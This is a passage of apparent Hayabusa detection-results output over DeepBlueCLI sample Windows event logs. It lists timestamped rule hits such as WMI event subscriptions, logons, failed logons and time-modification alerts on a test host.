Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 05:56:26.275 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 05:56:26.275 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 05:56:26.275 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 05:56:26.275 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 05:56:26.275 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 05:56:26.275 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 05:56:26.275 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 05:56:26.275 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 05:56:26.275 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 05:56:28.619 +09:00,IE8Win7,19,high,WMI Event 
Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 05:56:36.634 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 05:56:36.634 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 05:56:36.649 +09:00,IE8Win7,4616,medium,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 05:56:52.000 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx +2013-10-24 05:56:52.000 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx +2013-10-24 06:05:37.180 +09:00,IE8Win7,4647,informational,Logoff - User Initiated,User: IEUser : LogonID: 0x2b18a,rules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 06:07:06.390 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 06:07:06.390 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 06:07:31.859 +09:00,IE8Win7,4624,informational,Logon Type 0 - 
System,Bootup,rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 06:07:35.000 +09:00,IE8Win7,4625,medium,Failed Logon From Public IP,,rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx +2013-10-24 06:07:44.487 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 06:07:44.487 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 06:07:44.487 +09:00,IE8Win7,4616,medium,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 06:09:53.000 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx +2013-10-24 06:09:53.000 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx +2013-10-24 06:10:53.299 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 06:13:38.283 +09:00,IE8Win7,4648,informational,Explicit Logon,Source User: IE8WIN7$ : Target User: IEUser : IP Address: 127.0.0.1 : Process: C:\Windows\System32\winlogon.exe : Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 06:13:38.283 
+09:00,IE8Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser : Workstation: IE8WIN7 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0x25519 : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 06:13:38.283 +09:00,IE8Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser : Workstation: IE8WIN7 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0x2553c : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 06:13:38.283 +09:00,IE8Win7,4672,informational,Admin Logon,User: IEUser : LogonID: 0x25519,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 06:35:27.013 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 06:35:27.013 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 06:35:27.028 +09:00,IE8Win7,4616,medium,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 06:50:27.138 +09:00,IE8Win7,4648,informational,Explicit Logon,Source User: IEUser : Target User: rdavis : IP Address: - : Process: : Target Server: cifs/rdavis-7.sharplogic.local,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 06:53:45.841 +09:00,IE8Win7,4648,informational,Explicit Logon,Source User: IE8WIN7$ : Target User: 
IEUser : IP Address: - : Process: C:\Windows\System32\svchost.exe : Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 06:53:45.841 +09:00,IE8Win7,4624,informational,Logon Type 4 - Batch,User: IEUser : Workstation: IE8WIN7 : IP Address: - : Port: - : LogonID: 0x15f454,rules/hayabusa/default/events/Security/Logons/4624_LogonType-4-Batch.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 06:53:45.841 +09:00,IE8Win7,4672,informational,Admin Logon,User: IEUser : LogonID: 0x15f454,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 06:53:45.919 +09:00,IE8Win7,4634,informational,Logoff,User: IEUser : LogonID: 0x15f454,rules/hayabusa/default/events/Security/Logons/4634_Logoff.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 06:53:46.263 +09:00,IE8Win7,4648,informational,Explicit Logon,Source User: IE8WIN7$ : Target User: IEUser : IP Address: - : Process: C:\Windows\System32\lsass.exe : Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 06:53:46.263 +09:00,IE8Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser : Workstation: IE8WIN7 : IP Address: - : Port: - : LogonID: 0x15f53a : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 06:53:46.263 +09:00,IE8Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser : Workstation: IE8WIN7 : IP Address: - : Port: - : LogonID: 0x15f546 : (Warning: Credentials are stored in 
memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 06:53:46.263 +09:00,IE8Win7,4672,informational,Admin Logon,User: IEUser : LogonID: 0x15f53a,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 06:53:46.669 +09:00,IE8Win7,4634,informational,Logoff,User: IEUser : LogonID: 0x15f546,rules/hayabusa/default/events/Security/Logons/4634_Logoff.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 06:53:46.669 +09:00,IE8Win7,4634,informational,Logoff,User: IEUser : LogonID: 0x15f53a,rules/hayabusa/default/events/Security/Logons/4634_Logoff.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 06:54:01.732 +09:00,IE8Win7,4647,informational,Logoff - User Initiated,User: IEUser : LogonID: 0x2553c,rules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 06:55:02.343 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 06:55:02.343 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 06:55:25.000 +09:00,IE8Win7,4624,informational,Logon Type 0 - System,Bootup,rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 06:55:32.000 +09:00,IE8Win7,4625,medium,Failed Logon From Public IP,,rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx +2013-10-24 06:55:35.625 
+09:00,IE8Win7,4648,informational,Explicit Logon,Source User: IE8WIN7$ : Target User: IEUser : IP Address: 127.0.0.1 : Process: C:\Windows\System32\winlogon.exe : Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 06:55:35.625 +09:00,IE8Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser : Workstation: IE8WIN7 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0xdad4 : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 06:55:35.625 +09:00,IE8Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser : Workstation: IE8WIN7 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0xdafc : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 06:55:35.625 +09:00,IE8Win7,4672,informational,Admin Logon,User: IEUser : LogonID: 0xdad4,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 06:55:37.450 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 06:55:37.450 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 06:55:37.450 +09:00,IE8Win7,4616,medium,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 06:55:44.840 +09:00,IE8Win7,4648,informational,Explicit Logon,Source User: 
IE8WIN7$ : Target User: IEUser : IP Address: - : Process: C:\Windows\System32\svchost.exe : Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 06:55:44.840 +09:00,IE8Win7,4624,informational,Logon Type 4 - Batch,User: IEUser : Workstation: IE8WIN7 : IP Address: - : Port: - : LogonID: 0x13dbc,rules/hayabusa/default/events/Security/Logons/4624_LogonType-4-Batch.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 06:55:44.840 +09:00,IE8Win7,4672,informational,Admin Logon,User: IEUser : LogonID: 0x13dbc,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 06:57:51.000 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx +2013-10-24 06:57:51.000 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx +2013-10-24 07:00:55.356 +09:00,IE8Win7,4647,informational,Logoff - User Initiated,User: IEUser : LogonID: 0xdafc,rules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 07:00:55.903 +09:00,IE8Win7,4634,informational,Logoff,User: IEUser : LogonID: 0xdafc,rules/hayabusa/default/events/Security/Logons/4634_Logoff.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 07:00:55.903 +09:00,IE8Win7,4634,informational,Logoff,User: IEUser : LogonID: 0xdad4,rules/hayabusa/default/events/Security/Logons/4634_Logoff.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 07:01:28.840 +09:00,IE8Win7,4648,informational,Explicit Logon,Source User: IE8WIN7$ : 
Target User: IEUser : IP Address: 127.0.0.1 : Process: C:\Windows\System32\winlogon.exe : Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 07:01:28.840 +09:00,IE8Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser : Workstation: IE8WIN7 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0x4bafc : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 07:01:28.840 +09:00,IE8Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser : Workstation: IE8WIN7 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0x4bb14 : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 07:01:28.840 +09:00,IE8Win7,4672,informational,Admin Logon,User: IEUser : LogonID: 0x4bafc,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 07:04:16.809 +09:00,IE8Win7,4647,informational,Logoff - User Initiated,User: IEUser : LogonID: 0x4bb14,rules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 07:05:00.218 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 07:05:00.218 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 07:05:21.859 +09:00,IE8Win7,4624,informational,Logon Type 0 - 
System,Bootup,rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 07:05:31.000 +09:00,IE8Win7,4625,medium,Failed Logon From Public IP,,rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx +2013-10-24 07:05:32.609 +09:00,IE8Win7,4648,informational,Explicit Logon,Source User: IE8WIN7$ : Target User: IEUser : IP Address: 127.0.0.1 : Process: C:\Windows\System32\winlogon.exe : Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 07:05:32.609 +09:00,IE8Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser : Workstation: IE8WIN7 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0xd99e : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 07:05:32.609 +09:00,IE8Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser : Workstation: IE8WIN7 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0xd9c6 : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 07:05:32.609 +09:00,IE8Win7,4672,informational,Admin Logon,User: IEUser : LogonID: 0xd99e,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 07:05:36.944 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 07:05:36.944 +09:00,IE8Win7,1,high,Execution Of Other File Type Than 
.exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 07:05:36.944 +09:00,IE8Win7,4616,medium,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 07:05:40.928 +09:00,IE8Win7,4648,informational,Explicit Logon,Source User: IE8WIN7$ : Target User: IEUser : IP Address: - : Process: C:\Windows\System32\svchost.exe : Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 07:05:40.928 +09:00,IE8Win7,4624,informational,Logon Type 4 - Batch,User: IEUser : Workstation: IE8WIN7 : IP Address: - : Port: - : LogonID: 0x144df,rules/hayabusa/default/events/Security/Logons/4624_LogonType-4-Batch.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 07:05:40.928 +09:00,IE8Win7,4672,informational,Admin Logon,User: IEUser : LogonID: 0x144df,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 07:08:00.000 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx +2013-10-24 07:08:00.000 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx +2013-10-24 07:10:10.631 +09:00,IE8Win7,9,medium,Raw Disk Access Using Illegitimate Tools,,rules/sigma/raw_access_thread/sysmon_raw_disk_access_using_illegitimate_tools.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 08:11:15.779 +09:00,IE8Win7,1,high,Execution Of Not Existing 
File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 08:11:15.779 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 08:11:15.779 +09:00,IE8Win7,4616,medium,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-22 08:29:47.424 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-22 08:29:47.424 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-22 08:29:47.424 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-22 08:29:47.424 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-22 08:29:47.424 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-22 08:29:47.424 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-22 08:29:47.424 +09:00,IE8Win7,4616,medium,Unauthorized System Time 
Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-22 08:29:47.517 +09:00,IE8Win7,9,medium,Raw Disk Access Using Illegitimate Tools,,rules/sigma/raw_access_thread/sysmon_raw_disk_access_using_illegitimate_tools.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-22 08:30:12.392 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-22 08:30:12.392 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-22 08:32:12.657 +09:00,IE8Win7,4634,informational,Logoff,User: IEUser : LogonID: 0x144df,rules/hayabusa/default/events/Security/Logons/4634_Logoff.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-22 08:34:00.063 +09:00,IE8Win7,4648,informational,Explicit Logon,Source User: IEUser : Target User: rdavis : IP Address: - : Process: : Target Server: HYPERV.sharplogic.local,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-22 08:40:48.532 +09:00,IE8Win7,4647,informational,Logoff - User Initiated,User: IEUser : LogonID: 0xd9c6,rules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-22 08:42:11.390 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-22 08:42:11.390 +09:00,IE8Win7,1,high,Execution Of Other File Type Than 
.exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-22 08:42:34.625 +09:00,IE8Win7,4624,informational,Logon Type 0 - System,Bootup,rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-22 08:42:43.000 +09:00,IE8Win7,4625,medium,Failed Logon From Public IP,,rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx +2014-11-22 08:42:49.610 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-22 08:42:49.610 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-22 08:42:49.610 +09:00,IE8Win7,4616,medium,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-22 08:43:06.625 +09:00,IE8Win7,4648,informational,Explicit Logon,Source User: IE8WIN7$ : Target User: IEUser : IP Address: 127.0.0.1 : Process: C:\Windows\System32\winlogon.exe : Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-22 08:43:06.625 +09:00,IE8Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser : Workstation: IE8WIN7 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0x16559 : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-22 08:43:06.625 +09:00,IE8Win7,4624,informational,Logon Type 2 - 
Interactive,User: IEUser : Workstation: IE8WIN7 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0x16589 : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-22 08:43:06.625 +09:00,IE8Win7,4672,informational,Admin Logon,User: IEUser : LogonID: 0x16559,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-22 08:44:23.818 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-22 08:44:23.818 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2014-11-22 08:44:23.849 +09:00,IE8Win7,4616,medium,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2014-11-22 08:45:01.000 +09:00,IE8Win7,1,high,Execution Of Not Existing 